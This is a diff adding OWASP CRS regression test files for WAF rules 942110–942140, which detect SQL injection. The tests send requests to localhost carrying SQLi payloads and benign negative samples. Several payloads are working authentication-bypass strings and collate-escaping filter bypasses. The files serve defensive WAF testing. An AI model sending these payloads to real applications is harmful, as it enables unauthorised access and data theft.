b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942110.yaml @@ -0,0 +1,40 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942110.yaml +tests: + - test_title: 942110-1 + desc: "Common SQL Injection Testing" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # NB: false positives: /?var=\'\' + data: "var=%27%27" + version: HTTP/1.0 + output: + log_contains: id "942110" + - test_title: 942110-2 + desc: "Common SQL Injection Testing on filename" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/foo/'%7c%7c1==1|'" + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942110" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml new file mode 100644 index 00000000..b2cf47bc --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -0,0 +1,674 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942120.yaml +tests: + - test_title: 942120-1 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-2 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-3 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-4 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-5 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-6 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-7 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-8 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-9 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-10 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-11 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-12 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-13 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-14 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-15 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-16 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-17 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-18 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-19 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-20 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-21 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "%3E%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-22 + desc: "SQL Injection Attack: not between * and " + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-23 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-24 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-25 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-26 + desc: "SQL Injection Attack: SQL Operator Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-27 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-28 + desc: "SQLite collate nocase" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20nocase--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-29 + desc: "SQL collate`nocase`" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-30 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-31 + desc: "Invalid SQL collate foo" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-32 + desc: "Collate bypass with character escaping" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-33 + desc: "Collate bypass with postgress string escaping U&" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-34 + desc: "Detect auth bypass email=' notnull --" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-35 + desc: "Test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_title: 942120-36 + desc: "Negative test for IJ5N1CXB - unlikely" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: + text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + no_log_contains: id "942120" + - test_title: 942120-37 + desc: "Test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log_contains: id "942120" + - test_title: 942120-38 + desc: "Negative test for HOH7M88Q - likelihood" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + no_log_contains: id "942120" + - test_title: 942120-39 + desc: "Detect path-based SQLi attempt" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log_contains: id "942120" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml new file mode 100644 index 00000000..0056a006 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -0,0 +1,160 @@ +--- +meta: + author: "Christian S.J. Peron and Allan Boll, Franziska Bühler" + description: None + enabled: true + name: 942130.yaml +tests: + - test_title: 942130-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: /post + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + no_log_contains: id "942130" + - test_title: 942130-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-5 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-7 + desc: "SQL Injection Attack: SQL Tautology - like" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-8 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + no_log_contains: id "942130" + - test_title: 942130-9 + desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log_contains: id "942130" + - test_title: 942130-10 + desc: "SQL Injection Attack: SQL Tautology using glob" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log_contains: id "942130" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml new file mode 100644 index 00000000..934a8ac8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -0,0 +1,114 @@ +--- +meta: + author: "Felipe Zipitria" + description: SQL Tautology + enabled: true + name: 942131.yaml +tests: + - test_title: 942131-1 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-2 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-3 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-4 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-5 + desc: "SQL Injection Attack: SQL Tautology negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + no_log_contains: id "942131" + - test_title: 942131-6 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log_contains: id "942131" + - test_title: 942131-7 + desc: "SQL Injection Attack: SQL Tautology" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + no_log_contains: id "942131" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml new file mode 100644 index 00000000..1cdc7b66 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -0,0 +1,295 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942140.yaml +tests: + - test_title: 942140-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "db_name(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: 